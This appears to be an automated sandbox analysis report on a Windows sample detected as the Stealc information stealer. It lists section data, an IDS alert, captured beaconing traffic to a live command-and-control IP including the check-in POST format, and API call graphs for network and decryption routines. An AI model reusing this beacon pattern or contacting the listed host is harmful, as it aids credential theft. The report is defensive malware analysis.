                                | 0x1000 | 0x2e7000 | 0x67600 | 25dd4da1d7f8149948dea8d367c2405f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                | 0x2ea000 | 0x293000 | 0x200 | f0329b65f021e05372719b90c77ef9d0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                fvvfrivq | 0x57d000 | 0x195000 | 0x194400 | 294176fbe60172a9835ca56b7313ff57 | False | 0.9949130575525664 | data | 7.9536048042194505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                fjsconsa | 0x712000 | 0x1000 | 0x600 | 47731b5350d27b88bd414222d3dcf93b | False | 0.5852864583333334 | data | 5.100438224541122 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant | 0x713000 | 0x3000 | 0x2200 | 347fee62de20c458585ee27470a327ce | False | 0.062270220588235295 | DOS executable (COM) | 0.8132786838728902 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                DLL | Import
                                kernel32.dll | lstrcpy
                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                2024-10-29T22:13:18.983215+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Oct 29, 2024 22:13:17.748547077 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                Oct 29, 2024 22:13:17.754158974 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                Oct 29, 2024 22:13:17.754235983 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                Oct 29, 2024 22:13:17.754535913 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                Oct 29, 2024 22:13:17.760410070 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                Oct 29, 2024 22:13:18.686731100 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                Oct 29, 2024 22:13:18.686932087 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                Oct 29, 2024 22:13:18.691016912 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                Oct 29, 2024 22:13:18.696372032 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                Oct 29, 2024 22:13:18.983040094 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                Oct 29, 2024 22:13:18.983215094 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                Oct 29, 2024 22:13:21.172844887 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 6644 | C:\Users\user\Desktop\file.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 29, 2024 22:13:17.754535913 CET | 90 | OUT | GET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 29, 2024 22:13:18.686731100 CET | 203 | IN | HTTP/1.1 200 OK
                                Date: Tue, 29 Oct 2024 21:13:18 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 29, 2024 22:13:18.691016912 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 42 42 35 43 31 32 46 35 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a
                                Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="hwid"6BBB5C12F5753799621165------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="build"tale------FHCGCFHDHIIIDGCAAEGD--
                                Oct 29, 2024 22:13:18.983040094 CET210INHTTP/1.1 200 OK
                                Date: Tue, 29 Oct 2024 21:13:18 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=

                                Target ID: 0
                                Start time: 17:13:13
                                Start date: 29/10/2024
                                Path: C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit): true
                                Commandline: "C:\Users\user\Desktop\file.exe"
                                Imagebase: 0xba0000
                                File size: 2'094'592 bytes
                                MD5 hash: 31C844530D857C4266248543C40284CC
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2131533461.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation: low
                                Has exited: true


                                  Execution Graph

                                  Execution Coverage: 3.1%
                                  Dynamic/Decrypted Code Coverage: 0%
                                  Signature Coverage: 3.5%
                                  Total number of Nodes: 1327
                                  Total number of Limit Nodes: 24
API calls 38813->38814 38815 ba43d3 38814->38815 38816 ba4610 2 API calls 38815->38816 38817 ba43ec 38816->38817 38818 ba4610 2 API calls 38817->38818 38819 ba4405 38818->38819 38820 ba4610 2 API calls 38819->38820 38821 ba441e 38820->38821 38822 ba4610 2 API calls 38821->38822 38823 ba4437 38822->38823 38824 ba4610 2 API calls 38823->38824 38825 ba4450 38824->38825 38826 ba4610 2 API calls 38825->38826 38827 ba4469 38826->38827 38828 ba4610 2 API calls 38827->38828 38829 ba4482 38828->38829 38830 ba4610 2 API calls 38829->38830 38831 ba449b 38830->38831 38832 ba4610 2 API calls 38831->38832 38833 ba44b4 38832->38833 38834 ba4610 2 API calls 38833->38834 38835 ba44cd 38834->38835 38836 ba4610 2 API calls 38835->38836 38837 ba44e6 38836->38837 38838 ba4610 2 API calls 38837->38838 38839 ba44ff 38838->38839 38840 ba4610 2 API calls 38839->38840 38841 ba4518 38840->38841 38842 ba4610 2 API calls 38841->38842 38843 ba4531 38842->38843 38844 ba4610 2 API calls 38843->38844 38845 ba454a 38844->38845 38846 ba4610 2 API calls 38845->38846 38847 ba4563 38846->38847 38848 ba4610 2 API calls 38847->38848 38849 ba457c 38848->38849 38850 ba4610 2 API calls 38849->38850 38851 ba4595 38850->38851 38852 ba4610 2 API calls 38851->38852 38853 ba45ae 38852->38853 38854 ba4610 2 API calls 38853->38854 38855 ba45c7 38854->38855 38856 ba4610 2 API calls 38855->38856 38857 ba45e0 38856->38857 38858 ba4610 2 API calls 38857->38858 38859 ba45f9 38858->38859 38860 bb9f20 38859->38860 38861 bb9f30 43 API calls 38860->38861 38862 bba346 8 API calls 38860->38862 38861->38862 38863 bba3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38862->38863 38864 bba456 38862->38864 38863->38864 38865 bba463 8 API calls 38864->38865 38866 bba526 38864->38866 38865->38866 38867 bba5a8 38866->38867 38868 bba52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38866->38868 38869 bba647 38867->38869 38870 bba5b5 6 API calls 38867->38870 38868->38867 38871 
bba72f 38869->38871 38872 bba654 9 API calls 38869->38872 38870->38869 38873 bba738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38871->38873 38874 bba7b2 38871->38874 38872->38871 38873->38874 38875 bba7bb GetProcAddress GetProcAddress 38874->38875 38876 bba7ec 38874->38876 38875->38876 38877 bba825 38876->38877 38878 bba7f5 GetProcAddress GetProcAddress 38876->38878 38879 bba922 38877->38879 38880 bba832 10 API calls 38877->38880 38878->38877 38881 bba92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38879->38881 38882 bba98d 38879->38882 38880->38879 38881->38882 38883 bba9ae 38882->38883 38884 bba996 GetProcAddress 38882->38884 38885 bb5ef3 38883->38885 38886 bba9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38883->38886 38884->38883 38887 ba1590 38885->38887 38886->38885 39157 ba16b0 38887->39157 38890 bbaab0 lstrcpy 38891 ba15b5 38890->38891 38892 bbaab0 lstrcpy 38891->38892 38893 ba15c7 38892->38893 38894 bbaab0 lstrcpy 38893->38894 38895 ba15d9 38894->38895 38896 bbaab0 lstrcpy 38895->38896 38897 ba1663 38896->38897 38898 bb5760 38897->38898 38899 bb5771 38898->38899 38900 bbab30 2 API calls 38899->38900 38901 bb577e 38900->38901 38902 bbab30 2 API calls 38901->38902 38903 bb578b 38902->38903 38904 bbab30 2 API calls 38903->38904 38905 bb5798 38904->38905 38906 bbaa50 lstrcpy 38905->38906 38907 bb57a5 38906->38907 38908 bbaa50 lstrcpy 38907->38908 38909 bb57b2 38908->38909 38910 bbaa50 lstrcpy 38909->38910 38911 bb57bf 38910->38911 38912 bbaa50 lstrcpy 38911->38912 38944 bb57cc 38912->38944 38913 bbaa50 lstrcpy 38913->38944 38914 bbab30 lstrlen lstrcpy 38914->38944 38915 bb5893 StrCmpCA 38915->38944 38916 bb58f0 StrCmpCA 38917 bb5a2c 38916->38917 38916->38944 38919 bbabb0 lstrcpy 38917->38919 38918 bbaab0 lstrcpy 38918->38944 38920 bb5a38 38919->38920 38921 bbab30 2 API calls 38920->38921 38922 bb5a46 38921->38922 38925 bbab30 2 API calls 38922->38925 38923 bb5aa6 StrCmpCA 38926 bb5be1 
38923->38926 38923->38944 38924 bb5440 20 API calls 38924->38944 38928 bb5a55 38925->38928 38927 bbabb0 lstrcpy 38926->38927 38929 bb5bed 38927->38929 38930 ba16b0 lstrcpy 38928->38930 38931 bbab30 2 API calls 38929->38931 38932 bb5a61 38930->38932 38933 bb5bfb 38931->38933 38932->38005 38936 bbab30 2 API calls 38933->38936 38934 bb5c5b StrCmpCA 38937 bb5c78 38934->38937 38938 bb5c66 Sleep 38934->38938 38935 bb5510 25 API calls 38935->38944 38939 bb5c0a 38936->38939 38940 bbabb0 lstrcpy 38937->38940 38938->38944 38941 ba16b0 lstrcpy 38939->38941 38942 bb5c84 38940->38942 38941->38932 38943 bbab30 2 API calls 38942->38943 38945 bb5c93 38943->38945 38944->38913 38944->38914 38944->38915 38944->38916 38944->38918 38944->38923 38944->38924 38944->38934 38944->38935 38947 bb59da StrCmpCA 38944->38947 38950 bb5b8f StrCmpCA 38944->38950 38951 bbabb0 lstrcpy 38944->38951 38952 ba1590 lstrcpy 38944->38952 38946 bbab30 2 API calls 38945->38946 38948 bb5ca2 38946->38948 38947->38944 38949 ba16b0 lstrcpy 38948->38949 38949->38932 38950->38944 38951->38944 38952->38944 38954 bb76dc 38953->38954 38955 bb76e3 GetVolumeInformationA 38953->38955 38954->38955 38959 bb7721 38955->38959 38956 bb778c GetProcessHeap RtlAllocateHeap 38957 bb77a9 38956->38957 38958 bb77b8 wsprintfA 38956->38958 38960 bbaa50 lstrcpy 38957->38960 38961 bbaa50 lstrcpy 38958->38961 38959->38956 38962 bb5ff7 38960->38962 38961->38962 38962->38026 38964 bbaab0 lstrcpy 38963->38964 38965 ba48e9 38964->38965 39166 ba4800 38965->39166 38967 ba48f5 38968 bbaa50 lstrcpy 38967->38968 38969 ba4927 38968->38969 38970 bbaa50 lstrcpy 38969->38970 38971 ba4934 38970->38971 38972 bbaa50 lstrcpy 38971->38972 38973 ba4941 38972->38973 38974 bbaa50 lstrcpy 38973->38974 38975 ba494e 38974->38975 38976 bbaa50 lstrcpy 38975->38976 38977 ba495b InternetOpenA StrCmpCA 38976->38977 38978 ba4994 38977->38978 38979 ba4f1b InternetCloseHandle 38978->38979 39172 bb8cf0 38978->39172 38981 ba4f38 38979->38981 39187 baa210 
CryptStringToBinaryA 38981->39187 38982 ba49b3 39180 bbac30 38982->39180 38985 ba49c6 38987 bbabb0 lstrcpy 38985->38987 38992 ba49cf 38987->38992 38988 bbab30 2 API calls 38989 ba4f55 38988->38989 38990 bbacc0 4 API calls 38989->38990 38993 ba4f6b 38990->38993 38991 ba4f77 codecvt 38995 bbaab0 lstrcpy 38991->38995 38996 bbacc0 4 API calls 38992->38996 38994 bbabb0 lstrcpy 38993->38994 38994->38991 39008 ba4fa7 38995->39008 38997 ba49f9 38996->38997 38998 bbabb0 lstrcpy 38997->38998 38999 ba4a02 38998->38999 39000 bbacc0 4 API calls 38999->39000 39001 ba4a21 39000->39001 39002 bbabb0 lstrcpy 39001->39002 39003 ba4a2a 39002->39003 39004 bbac30 3 API calls 39003->39004 39005 ba4a48 39004->39005 39006 bbabb0 lstrcpy 39005->39006 39007 ba4a51 39006->39007 39009 bbacc0 4 API calls 39007->39009 39008->38029 39010 ba4a70 39009->39010 39011 bbabb0 lstrcpy 39010->39011 39012 ba4a79 39011->39012 39013 bbacc0 4 API calls 39012->39013 39014 ba4a98 39013->39014 39015 bbabb0 lstrcpy 39014->39015 39016 ba4aa1 39015->39016 39017 bbacc0 4 API calls 39016->39017 39018 ba4acd 39017->39018 39019 bbac30 3 API calls 39018->39019 39020 ba4ad4 39019->39020 39021 bbabb0 lstrcpy 39020->39021 39022 ba4add 39021->39022 39023 ba4af3 InternetConnectA 39022->39023 39023->38979 39024 ba4b23 HttpOpenRequestA 39023->39024 39026 ba4b78 39024->39026 39027 ba4f0e InternetCloseHandle 39024->39027 39028 bbacc0 4 API calls 39026->39028 39027->38979 39029 ba4b8c 39028->39029 39030 bbabb0 lstrcpy 39029->39030 39031 ba4b95 39030->39031 39032 bbac30 3 API calls 39031->39032 39033 ba4bb3 39032->39033 39034 bbabb0 lstrcpy 39033->39034 39035 ba4bbc 39034->39035 39036 bbacc0 4 API calls 39035->39036 39037 ba4bdb 39036->39037 39038 bbabb0 lstrcpy 39037->39038 39039 ba4be4 39038->39039 39040 bbacc0 4 API calls 39039->39040 39041 ba4c05 39040->39041 39042 bbabb0 lstrcpy 39041->39042 39043 ba4c0e 39042->39043 39044 bbacc0 4 API calls 39043->39044 39045 ba4c2e 39044->39045 39046 bbabb0 lstrcpy 39045->39046 39047 
ba4c37 39046->39047 39048 bbacc0 4 API calls 39047->39048 39049 ba4c56 39048->39049 39050 bbabb0 lstrcpy 39049->39050 39051 ba4c5f 39050->39051 39052 bbac30 3 API calls 39051->39052 39053 ba4c7d 39052->39053 39054 bbabb0 lstrcpy 39053->39054 39055 ba4c86 39054->39055 39056 bbacc0 4 API calls 39055->39056 39057 ba4ca5 39056->39057 39058 bbabb0 lstrcpy 39057->39058 39059 ba4cae 39058->39059 39060 bbacc0 4 API calls 39059->39060 39061 ba4ccd 39060->39061 39062 bbabb0 lstrcpy 39061->39062 39063 ba4cd6 39062->39063 39064 bbac30 3 API calls 39063->39064 39065 ba4cf4 39064->39065 39066 bbabb0 lstrcpy 39065->39066 39067 ba4cfd 39066->39067 39068 bbacc0 4 API calls 39067->39068 39069 ba4d1c 39068->39069 39070 bbabb0 lstrcpy 39069->39070 39071 ba4d25 39070->39071 39072 bbacc0 4 API calls 39071->39072 39073 ba4d46 39072->39073 39074 bbabb0 lstrcpy 39073->39074 39075 ba4d4f 39074->39075 39076 bbacc0 4 API calls 39075->39076 39077 ba4d6f 39076->39077 39078 bbabb0 lstrcpy 39077->39078 39079 ba4d78 39078->39079 39080 bbacc0 4 API calls 39079->39080 39081 ba4d97 39080->39081 39082 bbabb0 lstrcpy 39081->39082 39083 ba4da0 39082->39083 39084 bbac30 3 API calls 39083->39084 39085 ba4dbe 39084->39085 39086 bbabb0 lstrcpy 39085->39086 39087 ba4dc7 39086->39087 39088 bbaa50 lstrcpy 39087->39088 39089 ba4de2 39088->39089 39090 bbac30 3 API calls 39089->39090 39091 ba4e03 39090->39091 39092 bbac30 3 API calls 39091->39092 39093 ba4e0a 39092->39093 39094 bbabb0 lstrcpy 39093->39094 39095 ba4e16 39094->39095 39096 ba4e37 lstrlen 39095->39096 39097 ba4e4a 39096->39097 39098 ba4e53 lstrlen 39097->39098 39186 bbade0 39098->39186 39100 ba4e63 HttpSendRequestA 39101 ba4e82 InternetReadFile 39100->39101 39102 ba4eb7 InternetCloseHandle 39101->39102 39107 ba4eae 39101->39107 39105 bbab10 39102->39105 39104 bbacc0 4 API calls 39104->39107 39105->39027 39106 bbabb0 lstrcpy 39106->39107 39107->39101 39107->39102 39107->39104 39107->39106 39193 bbade0 39108->39193 39110 bb1a14 StrCmpCA 39111 bb1a1f 
ExitProcess 39110->39111 39113 bb1a27 39110->39113 39112 bb1c12 39112->38031 39113->39112 39114 bb1b1f StrCmpCA 39113->39114 39115 bb1afd StrCmpCA 39113->39115 39116 bb1acf StrCmpCA 39113->39116 39117 bb1aad StrCmpCA 39113->39117 39118 bb1b63 StrCmpCA 39113->39118 39119 bb1b82 StrCmpCA 39113->39119 39120 bb1b41 StrCmpCA 39113->39120 39121 bb1ba1 StrCmpCA 39113->39121 39122 bb1bc0 StrCmpCA 39113->39122 39123 bbab30 lstrlen lstrcpy 39113->39123 39114->39113 39115->39113 39116->39113 39117->39113 39118->39113 39119->39113 39120->39113 39121->39113 39122->39113 39123->39113 39124->38037 39125->38039 39126->38045 39127->38047 39128->38053 39129->38055 39130->38059 39131->38063 39132->38067 39133->38073 39134->38075 39135->38079 39136->38092 39137->38096 39138->38097 39139->38093 39140->38097 39141->38112 39142->38099 39143->38103 39144->38104 39145->38109 39146->38114 39147->38116 39148->38123 39149->38130 39150->38150 39151->38154 39152->38153 39153->38149 39154->38153 39155->38163 39158 bbaab0 lstrcpy 39157->39158 39159 ba16c3 39158->39159 39160 bbaab0 lstrcpy 39159->39160 39161 ba16d5 39160->39161 39162 bbaab0 lstrcpy 39161->39162 39163 ba16e7 39162->39163 39164 bbaab0 lstrcpy 39163->39164 39165 ba15a3 39164->39165 39165->38890 39167 ba4816 39166->39167 39168 ba4888 lstrlen 39167->39168 39192 bbade0 39168->39192 39170 ba4898 InternetCrackUrlA 39171 ba48b7 39170->39171 39171->38967 39173 bbaa50 lstrcpy 39172->39173 39174 bb8d04 39173->39174 39175 bbaa50 lstrcpy 39174->39175 39176 bb8d12 GetSystemTime 39175->39176 39178 bb8d29 39176->39178 39177 bbaab0 lstrcpy 39179 bb8d8c 39177->39179 39178->39177 39179->38982 39181 bbac41 39180->39181 39182 bbac98 39181->39182 39184 bbac78 lstrcpy lstrcat 39181->39184 39183 bbaab0 lstrcpy 39182->39183 39185 bbaca4 39183->39185 39184->39182 39185->38985 39186->39100 39188 ba4f3e 39187->39188 39189 baa249 LocalAlloc 39187->39189 39188->38988 39188->38991 39189->39188 39190 baa264 CryptStringToBinaryA 39189->39190 39190->39188 39191 
baa289 LocalFree 39190->39191 39191->39188 39192->39170 39193->39110

                                  Control-flow Graph

                                  control_flow_graph 660 bb9bb0-bb9bc4 call bb9aa0 663 bb9bca-bb9dde call bb9ad0 GetProcAddress * 21 660->663 664 bb9de3-bb9e42 LoadLibraryA * 5 660->664 663->664 666 bb9e5d-bb9e64 664->666 667 bb9e44-bb9e58 GetProcAddress 664->667 668 bb9e96-bb9e9d 666->668 669 bb9e66-bb9e91 GetProcAddress * 2 666->669 667->666 671 bb9eb8-bb9ebf 668->671 672 bb9e9f-bb9eb3 GetProcAddress 668->672 669->668 673 bb9ed9-bb9ee0 671->673 674 bb9ec1-bb9ed4 GetProcAddress 671->674 672->671 675 bb9ee2-bb9f0c GetProcAddress * 2 673->675 676 bb9f11-bb9f12 673->676 674->673 675->676
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01301358), ref: 00BB9BF1
                                  • GetProcAddress.KERNEL32(75900000,01301208), ref: 00BB9C0A
                                  • GetProcAddress.KERNEL32(75900000,01301250), ref: 00BB9C22
                                  • GetProcAddress.KERNEL32(75900000,01301130), ref: 00BB9C3A
                                  • GetProcAddress.KERNEL32(75900000,013011D8), ref: 00BB9C53
                                  • GetProcAddress.KERNEL32(75900000,01309548), ref: 00BB9C6B
                                  • GetProcAddress.KERNEL32(75900000,012F6E68), ref: 00BB9C83
                                  • GetProcAddress.KERNEL32(75900000,012F7188), ref: 00BB9C9C
                                  • GetProcAddress.KERNEL32(75900000,01301160), ref: 00BB9CB4
                                  • GetProcAddress.KERNEL32(75900000,01301178), ref: 00BB9CCC
                                  • GetProcAddress.KERNEL32(75900000,013012C8), ref: 00BB9CE5
                                  • GetProcAddress.KERNEL32(75900000,01301190), ref: 00BB9CFD
                                  • GetProcAddress.KERNEL32(75900000,012F71A8), ref: 00BB9D15
                                  • GetProcAddress.KERNEL32(75900000,013011F0), ref: 00BB9D2E
                                  • GetProcAddress.KERNEL32(75900000,01301220), ref: 00BB9D46
                                  • GetProcAddress.KERNEL32(75900000,012F6E88), ref: 00BB9D5E
                                  • GetProcAddress.KERNEL32(75900000,01301268), ref: 00BB9D77
                                  • GetProcAddress.KERNEL32(75900000,01301448), ref: 00BB9D8F
                                  • GetProcAddress.KERNEL32(75900000,012F7088), ref: 00BB9DA7
                                  • GetProcAddress.KERNEL32(75900000,01301460), ref: 00BB9DC0
                                  • GetProcAddress.KERNEL32(75900000,012F7028), ref: 00BB9DD8
                                  • LoadLibraryA.KERNEL32(01301430,?,00BB6CA0), ref: 00BB9DEA
                                  • LoadLibraryA.KERNEL32(01301478,?,00BB6CA0), ref: 00BB9DFB
                                  • LoadLibraryA.KERNEL32(01301490,?,00BB6CA0), ref: 00BB9E0D
                                  • LoadLibraryA.KERNEL32(013014A8,?,00BB6CA0), ref: 00BB9E1F
                                  • LoadLibraryA.KERNEL32(01301418,?,00BB6CA0), ref: 00BB9E30
                                  • GetProcAddress.KERNEL32(75070000,013014C0), ref: 00BB9E52
                                  • GetProcAddress.KERNEL32(75FD0000,01301400), ref: 00BB9E73
                                  • GetProcAddress.KERNEL32(75FD0000,01309890), ref: 00BB9E8B
                                  • GetProcAddress.KERNEL32(75A50000,01309818), ref: 00BB9EAD
                                  • GetProcAddress.KERNEL32(74E50000,012F7008), ref: 00BB9ECE
                                  • GetProcAddress.KERNEL32(76E80000,01309558), ref: 00BB9EEF
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00BB9F06
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00BB9EFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 23d41d17526cbc9fac2bd6ef8dd862a3952413d2112016f2b9c0fd581814412f
                                  • Instruction ID: e3ed365295c450a61dfe00fe3b6afc051fac8b7fa3f3a5775e5beaad37350c33
                                  • Opcode Fuzzy Hash: 23d41d17526cbc9fac2bd6ef8dd862a3952413d2112016f2b9c0fd581814412f
                                  • Instruction Fuzzy Hash: D9A1A0B55096419FC344DFABFC889527BB9A74D345340862AFA9DE3231EB7099C8CF60

                                  Control-flow Graph

                                  control_flow_graph 764 ba4610-ba46e5 RtlAllocateHeap 781 ba46f0-ba46f6 764->781 782 ba479f-ba47f9 VirtualProtect 781->782 783 ba46fc-ba479a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA465F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BA47EC
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BA4617, 00BA4622, 00BA462D, 00BA4638, 00BA4643, 00BA4667, 00BA4672, 00BA467D, 00BA4688, 00BA4693, 00BA46A7, 00BA46B2, 00BA46BD, 00BA46C8, 00BA46D3, 00BA46FC, 00BA4707, 00BA4712, 00BA471D, 00BA4728, 00BA4763, 00BA476E, 00BA4779, 00BA4784, 00BA478F, 00BA479F, 00BA47AA, 00BA47B5, 00BA47C0, 00BA47CB
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string, repeated 30 times, joined by "$")
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 15affa8a17726a2a4c8321b75b6231d4d0a7be5d83a75bf8b72f4f29324b7d24
                                  • Instruction ID: 027549805b7647ed8acdd3b442dd772f57a966d337727bff494a5caf3d6558fd
                                  • Opcode Fuzzy Hash: 15affa8a17726a2a4c8321b75b6231d4d0a7be5d83a75bf8b72f4f29324b7d24
                                  • Instruction Fuzzy Hash: 5741CE707C370C7B8778F7A6A94EFDD76A65F46710B90708FEC0896290CAB066E04529

                                  Control-flow Graph (rendered as an image in the report; not reproduced here)
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4889
                                    • Part of subcall function 00BA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4899
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • InternetOpenA.WININET(00BC0DFF,00000001,00000000,00000000,00000000), ref: 00BA6331
                                  • StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA6353
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6385
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0130E828,00000000,00000000,00400100,00000000), ref: 00BA63D5
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA640F
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA6421
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BA644D
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BA64BD
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA653F
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6549
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
